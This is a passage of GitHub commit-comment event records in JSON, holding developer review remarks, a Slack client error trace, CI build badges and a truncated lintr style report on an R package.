{"id":"4604077290","type":"CommitCommentEvent","actor":{"login":"pex"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19134447,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T17:59:04Z","updated_at":"2016-09-22T17:59:04Z","body":"I see another problem with this release. Obviously #162 was merged into the current version ([1.4.1](https://github.com/electron-userland/electron-prebuilt/releases/tag/v1.4.1)). This change is not published to [npmjs.com](https://www.npmjs.com/package/electron-prebuilt), though."}},"created_at":"2016-09-22T17:59:04Z"}
{"id":"4604079340","type":"CommitCommentEvent","actor":{"login":"GirafiStudios"},"repo":{"name":"squeek502/AppleCore"},"payload":{"comment":{"id":19134453,"position":4,"line":8,"path":"java/squeek/applecore/ModInfo.java","commit_id":"c7c9d75e75a830c2b00b315ea06357bba5cb99b6","created_at":"2016-09-22T17:59:27Z","updated_at":"2016-09-22T17:59:27Z","body":"The standard for mod names which have multiple words in it, is to have a space between them.\r\nSo in my opinion the best thing here would be to change the mod name in the mcmod.info"}},"created_at":"2016-09-22T17:59:27Z"}
{"id":"4604082373","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19134461,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-22T17:59:59Z","updated_at":"2016-09-22T17:59:59Z","body":"develop (macumber) - x86_64-MacOS-10.10-clang: OK (2390 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.63%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T17:59:59Z"}
{"id":"4604085700","type":"CommitCommentEvent","actor":{"login":"akinomyoga"},"repo":{"name":"akinomyoga/contra"},"payload":{"comment":{"id":19134467,"position":103,"line":619,"path":"escseq.html","commit_id":"7a64f75f4c30f7b0db4a35db2b3c4ddb5a20ee23","created_at":"2016-09-22T18:00:31Z","updated_at":"2016-09-22T18:00:31Z","body":"ご指摘ありがとうございます! 直しました。\r\n\r\nこの repo によくお気づきになりましたね。お恥ずかしいものを見られてしまいました。この html は、昔 (適当に) まとめた私的なメモだったのですが、憶測や怪しい情報源からの情報を多く含んでいるので改めて洗い直しているところです (ゆっくり作業するつもりなので、いつ完成するともしれません)。"}},"created_at":"2016-09-22T18:00:31Z"}
{"id":"4604086452","type":"CommitCommentEvent","actor":{"login":"shunshou"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19134468,"position":21,"line":253,"path":"src/main/scala/firrtl/passes/AnnotateValidMemConfigs.scala","commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-22T18:00:40Z","updated_at":"2016-09-22T18:00:40Z","body":"It's not used b/c it hasn't been implemented yet. That line's quite long and has a lot of parentheses lol. But, it shouldn't be sp getOrElse dp. Both should be separately serialized. Basically, a design can have any # of single ported or dual ported memories. I'm just trying to make a list of ones that are used so the memory generation scripts can be called. "}},"created_at":"2016-09-22T18:00:40Z"}
{"id":"4604087536","type":"CommitCommentEvent","actor":{"login":"TigerRuby99"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":19134474,"position":null,"line":null,"path":null,"commit_id":"1c965f5ceeab4160a481dfe527ab772cc85c2cc1","created_at":"2016-09-22T18:00:50Z","updated_at":"2016-09-22T18:00:50Z","body":"What does it do?"}},"created_at":"2016-09-22T18:00:50Z"}
{"id":"4604091250","type":"CommitCommentEvent","actor":{"login":"lukebakken"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19134482,"position":null,"line":null,"path":null,"commit_id":"99c92ed3ee9ef7759d54439a9727d6b96d5e5b36","created_at":"2016-09-22T18:01:31Z","updated_at":"2016-09-22T18:01:31Z","body":"Good find 😄 🍥 "}},"created_at":"2016-09-22T18:01:31Z"}
{"id":"4604092700","type":"CommitCommentEvent","actor":{"login":"lsetiawan"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19134488,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-22T18:01:48Z","updated_at":"2016-09-22T18:01:48Z","body":"> by the way @lsetiawan and @emiliom the stackedinline feature is great, I didn't know about this feature before it is very helpful and I'll probably continue adding more.\r\n\r\n@miguelcleon I've just discovered that in creating view only option the stackedinline feature has really helped me speed up the process, especially defining fieldsets for these inline forms. So thank you for moving to this way for inlines. :)"}},"created_at":"2016-09-22T18:01:48Z"}
{"id":"4604093494","type":"CommitCommentEvent","actor":{"login":"mozkeeler"},"repo":{"name":"mozilla/tls-observatory"},"payload":{"comment":{"id":19134490,"position":140,"line":760,"path":"database/certificate.go","commit_id":"8ba16a90a8f4e3333b549e5289d0c2155b834d14","created_at":"2016-09-22T18:01:56Z","updated_at":"2016-09-22T18:01:56Z","body":"One issue here is that a certificate can be signed by an issuer with the same DN but with a different key."}},"created_at":"2016-09-22T18:01:56Z"}
{"id":"4604094468","type":"CommitCommentEvent","actor":{"login":"DeepAQ"},"repo":{"name":"TitaniumQuartet/HotelProject"},"payload":{"comment":{"id":19134492,"position":null,"line":null,"path":null,"commit_id":"3e33e51b44c8e0399137423316008341546ad38a","created_at":"2016-09-22T18:02:08Z","updated_at":"2016-09-22T18:02:08Z","body":"膜大佬！"}},"created_at":"2016-09-22T18:02:08Z"}
{"id":"4604094860","type":"CommitCommentEvent","actor":{"login":"kevinsawicki"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19134496,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T18:02:11Z","updated_at":"2016-09-22T18:02:11Z","body":"@pex #162 was merged after 1.4.1 was released, it will be included in the next release."}},"created_at":"2016-09-22T18:02:11Z"}
{"id":"4604099771","type":"CommitCommentEvent","actor":{"login":"mozkeeler"},"repo":{"name":"mozilla/tls-observatory"},"payload":{"comment":{"id":19134505,"position":140,"line":760,"path":"database/certificate.go","commit_id":"8ba16a90a8f4e3333b549e5289d0c2155b834d14","created_at":"2016-09-22T18:03:01Z","updated_at":"2016-09-22T18:03:01Z","body":"(But then if we support that, we have to watch out for loops in the issuance graph...)"}},"created_at":"2016-09-22T18:03:01Z"}
{"id":"4604104814","type":"CommitCommentEvent","actor":{"login":"Arevik95"},"repo":{"name":"Arevik95/BrowserHistory-Data-Structure-"},"payload":{"comment":{"id":19134521,"position":null,"line":null,"path":null,"commit_id":"4e3bd665f4ae8f0df7443912c698adafc33024c6","created_at":"2016-09-22T18:03:53Z","updated_at":"2016-09-22T18:03:53Z","body":"Data Structure Assignment 1"}},"created_at":"2016-09-22T18:03:53Z"}
{"id":"4604109904","type":"CommitCommentEvent","actor":{"login":"miotatsu"},"repo":{"name":"omega-gg/Sky"},"payload":{"comment":{"id":19134538,"position":25,"line":86,"path":"configure.sh","commit_id":"bae6bb6198d5e6e7976d534bacb14d25465da566","created_at":"2016-09-22T18:04:49Z","updated_at":"2016-09-22T18:04:49Z","body":"Should this be = \"linux\" instead of !=? This line currently prevents the configure script from copying the needed headers for Qt on linux"}},"created_at":"2016-09-22T18:04:49Z"}
{"id":"4604110284","type":"CommitCommentEvent","actor":{"login":"Bushjumper"},"repo":{"name":"SameWave/action-chat-client"},"payload":{"comment":{"id":19134541,"position":null,"line":null,"path":null,"commit_id":"5977a75ef68d7558013ec1991b6601ce1328d66c","created_at":"2016-09-22T18:04:53Z","updated_at":"2016-09-22T18:04:53Z","body":"@MondeSameWave Please let me know if you commit directly on master by mistake so that I can review the changes"}},"created_at":"2016-09-22T18:04:53Z"}
{"id":"4604110533","type":"CommitCommentEvent","actor":{"login":"jackkoenig"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19134543,"position":21,"line":253,"path":"src/main/scala/firrtl/passes/AnnotateValidMemConfigs.scala","commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-22T18:04:56Z","updated_at":"2016-09-22T18:04:56Z","body":"Okay I see. When the function is implemented it shouldn't be called serialize since that has some meaning in the compiler as a pure function that returns a String. It should be \"dump\" or \"writeToFile\" something."}},"created_at":"2016-09-22T18:04:56Z"}
{"id":"4604112796","type":"CommitCommentEvent","actor":{"login":"kaicataldo"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19134551,"position":18,"line":201,"path":"lib/util/source-code.js","commit_id":"97af7d512653b231db602403cc1d590f48de87b2","created_at":"2016-09-22T18:05:20Z","updated_at":"2016-09-22T18:05:20Z","body":"Yeah, this is actually disallowed by our own style rules"}},"created_at":"2016-09-22T18:05:20Z"}
{"id":"4604116024","type":"CommitCommentEvent","actor":{"login":"romanzubenko"},"repo":{"name":"JasonMcz/SOLOme.Project"},"payload":{"comment":{"id":19134557,"position":5,"line":21,"path":"app/routes/index.js","commit_id":"19ef1ed5d4a64fb50af3116b4eace4942a2ef964","created_at":"2016-09-22T18:05:54Z","updated_at":"2016-09-22T18:05:54Z","body":"Nice one Zhou"}},"created_at":"2016-09-22T18:05:54Z"}
{"id":"4604117637","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19134559,"position":106,"line":87,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T18:06:11Z","updated_at":"2016-09-22T18:06:11Z","body":"Qual è la domanda? ❓ \r\nSe è \"possiamo fare a meno di versione\", direi che non c'è problema."}},"created_at":"2016-09-22T18:06:11Z"}
{"id":"4604118565","type":"CommitCommentEvent","actor":{"login":"robertogagliotta"},"repo":{"name":"robertogagliotta/openemr"},"payload":{"comment":{"id":19134564,"position":null,"line":null,"path":null,"commit_id":"6c33d2577bc06f85f69dacee936ef7999055428c","created_at":"2016-09-22T18:06:21Z","updated_at":"2016-09-22T18:06:21Z","body":"table sct_concepts loaded with 427,131 rows"}},"created_at":"2016-09-22T18:06:21Z"}
{"id":"4604119758","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19134569,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-22T18:06:35Z","updated_at":"2016-09-22T18:06:35Z","body":"I do not have any time to argue about \"what's the best approach?\" over what I think is a minor detail.\r\n\r\nDo you want to change it? If so, file a PR."}},"created_at":"2016-09-22T18:06:35Z"}
{"id":"4604120391","type":"CommitCommentEvent","actor":{"login":"brishiz"},"repo":{"name":"brishiz/hubot-pager-me"},"payload":{"comment":{"id":19134570,"position":null,"line":null,"path":null,"commit_id":"f8226e8978fd50c46e3e3a3062dddc7d703c3789","created_at":"2016-09-22T18:06:42Z","updated_at":"2016-09-22T18:06:42Z","body":"I am using v2.1.13 of hubot-pager-me and v4.1.0 of hubot-slack. Adding these two lines fixed this error for me:\r\n\r\n```\r\nUnhandled rejection SlackAPIError: no_text\r\n  at makeAPICallPromiseResolverInner (/Users/bri/hubot/node_modules/@slack/client/lib/clients/client.js:156:22)\r\n  at handleHttpResponse (/Users/bri/hubot/node_modules/@slack/client/lib/clients/transports/call-transport.js:105:5)\r\n  at handleTransportResponse (/Users/bri/hubot/node_modules/@slack/client/lib/clients/transports/call-transport.js:142:19)\r\n  at apply (/Users/bri/hubot/node_modules/@slack/client/node_modules/lodash/lodash.js:482:17)\r\n  at wrapper (/Users/bri/hubot/node_modules/@slack/client/node_modules/lodash/lodash.js:5246:16)\r\n  at Request.handleRequestTranportRes (/Users/bri/hubot/node_modules/@slack/client/lib/clients/transports/request.js:20:5)\r\n  at apply (/Users/bri/hubot/node_modules/@slack/client/node_modules/lodash/lodash.js:482:17)\r\n  at Request.wrapper [as _callback] (/Users/bri/hubot/node_modules/@slack/client/node_modules/lodash/lodash.js:5246:16)\r\n  at Request.self.callback (/Users/bri/hubot/node_modules/request/request.js:187:22)\r\n  at emitTwo (events.js:87:13)\r\n  at Request.emit (events.js:172:7)\r\n  at Request.<anonymous> (/Users/bri/hubot/node_modules/request/request.js:1048:10)\r\n  at emitOne (events.js:77:13)\r\n  at Request.emit (events.js:169:7)\r\n  at IncomingMessage.<anonymous> (Users/bri/hubot/node_modules/request/request.js:969:12)\r\n  at emitNone (events.js:72:20)\r\n  at IncomingMessage.emit (events.js:166:7)\r\n  at endReadableNT (_stream_readable.js:921:12)\r\n  at nextTickCallbackWith2Args (node.js:442:9)\r\n  at process._tickCallback (node.js:356:17) \r\n```\r\n\r\n"}},"created_at":"2016-09-22T18:06:42Z"}
{"id":"4604125343","type":"CommitCommentEvent","actor":{"login":"RabiaSimsekk1"},"repo":{"name":"projectara/greybus"},"payload":{"comment":{"id":19134584,"position":11,"line":113,"path":"Documentation/firmware/firmware-management","commit_id":"1b3d8c6121954bf4e817b22e0a182fa52f5f4fca","created_at":"2016-09-22T18:07:35Z","updated_at":"2016-09-22T18:07:35Z","body":"h"}},"created_at":"2016-09-22T18:07:35Z"}
{"id":"4604128473","type":"CommitCommentEvent","actor":{"login":"Vazkii"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19134591,"position":13,"line":22,"path":"src/main/java/vazkii/botania/common/network/PacketHandler.java","commit_id":"23f62609020f3f2cb3ca359f945645c39892e094","created_at":"2016-09-22T18:08:11Z","updated_at":"2016-09-22T18:08:11Z","body":"Fuck."}},"created_at":"2016-09-22T18:08:11Z"}
{"id":"4604136205","type":"CommitCommentEvent","actor":{"login":"bryant1410"},"repo":{"name":"xmartlabs/Android-Base-Project"},"payload":{"comment":{"id":19134620,"position":10,"line":41,"path":"app/build.gradle","commit_id":"5cfd0157b2179a618245502e20dd7c20f6742f7a","created_at":"2016-09-22T18:09:36Z","updated_at":"2016-09-22T18:09:36Z","body":"What about here?"}},"created_at":"2016-09-22T18:09:36Z"}
{"id":"4604140190","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19134628,"position":106,"line":87,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T18:10:05Z","updated_at":"2016-09-22T18:10:05Z","body":"La domanda era relativa alla stringa “Tutte le lingue e le build”, visto \nche in tutte le altre per build avevi suggerito versione mi chiedevo se \ndovevo cambiare anche quella. Lascio invariato. Porto a spasso il cane e \nquando torno applico le modifiche. Grazie a entrambi per suggerimenti e \ncorrezioni varie.\n\n\n"}},"created_at":"2016-09-22T18:10:05Z"}
{"id":"4604144456","type":"CommitCommentEvent","actor":{"login":"ethanwinters"},"repo":{"name":"watson-virtual-agents/chat-widget"},"payload":{"comment":{"id":19134642,"position":null,"line":null,"path":null,"commit_id":"9b683e45a7068b62423144d7e1cde97ab2a86902","created_at":"2016-09-22T18:10:49Z","updated_at":"2016-09-22T18:10:49Z","body":"These creds have been deleted and no longer work."}},"created_at":"2016-09-22T18:10:49Z"}
{"id":"4604144729","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19134643,"position":null,"line":null,"path":null,"commit_id":"50e2e0a187ed77b36f22bf4fa136bb73751b9231","created_at":"2016-09-22T18:10:50Z","updated_at":"2016-09-22T18:10:50Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          